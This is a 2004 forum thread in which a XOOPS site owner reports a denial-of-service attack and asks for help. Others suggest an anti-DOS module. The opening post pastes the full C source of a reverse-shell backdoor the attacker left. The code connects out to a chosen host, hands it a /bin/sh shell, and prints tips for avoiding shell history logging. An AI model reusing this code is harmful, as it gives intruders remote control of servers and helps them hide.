| Re: DOS - space quota - Attack! Need help! |
| by winds on 2004/2/2 10:58:21 The site is ok now, or for now.
|
| Re: DOS - space quota - Attack! Need help! |
| by winds on 2004/2/2 4:21:48 Thanks Suns I will install this module for the future protection. I should do it before. Because it's third time that somebody did a damage to my site. I really don't know why. It seems that this time the attack is more serious than before...I fixed one thing, but found the other... Thanks again. |
| Re: DOS - space quota - Attack! Need help! |
| by sunsnapper on 2004/2/2 4:06:58 There is an anti-DOS attack module. I don't know if it will help in your case, but it may be worth a shot. https://xoops.org/modules/mydownloads/singlefile.php?cid=24&lid=483 |
| DOS - space quota - Attack! Need help! |
| by winds on 2004/2/1 23:23:21 My XOOPS web site is down, because of classic DOS -space quota- attack Web site is on Appache, Linux server... I found this temp file on the server left by attacker, may be it could give you more info: " #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> int main(int argc, char **argv) { char *host; int port = 80; int f; int l; int sock; struct in_addr ia; struct sockaddr_in sin, from; struct hostent *he; char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n" "Issue \"export TERM=xterm; exec bash -i\"\n" "For More Reliable Shell.\n" "Issue \"unset HISTFILE; unset SAVEHIST\"\n" "For Not Getting Logged.\n(;\n\n"; printf("Ir4dex Connect Back Backdoor\n\n"); if (argc < 2 || argc > 3) { printf("Usage: %s [Host] <port>\n", argv[0]); return 1; } printf("[*] Dumping Arguments\n"); l = strlen(argv[1]); if (l <= 0) { printf("[-] Invalid Host Name\n"); return 1; } if (!(host = (char *) malloc(l))) { printf("[-] Unable to Allocate Memory\n"); return 1; } strncpy(host, argv[1], l); if (argc == 3) { port = atoi(argv[2]); if (port <= 0 || port > 65535) { printf("[-] Invalid Port Number\n"); return 1; } } printf("[*] Resolvendo Nome Do Host\n"); he = gethostbyname(host); if (he) { memcpy(&ia.s_addr, he->h_addr, 4); } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) { printf("[-] Unable to Resolve: %s\n", host); return 1; } sin.sin_family = PF_INET; sin.sin_addr.s_addr = ia.s_addr; sin.sin_port = htons(port); printf("[*] Conectando...\n"); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[-] Socket Error\n"); return 1; } if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { printf("[-] Unable to Connect\n"); return 1; } printf("[*] Spawning Shell\n"); f = fork( ); if (f < 0) { printf("[-] Unable to Fork\n"); return 1; } else if (!f) { write(sock, msg, sizeof(msg)); dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); execl("/bin/sh", "shell", NULL); close(sock); return 0; } printf("[*] Conectado\n\n"); return 0; } " Does anybody know a quick fix for this? Please! |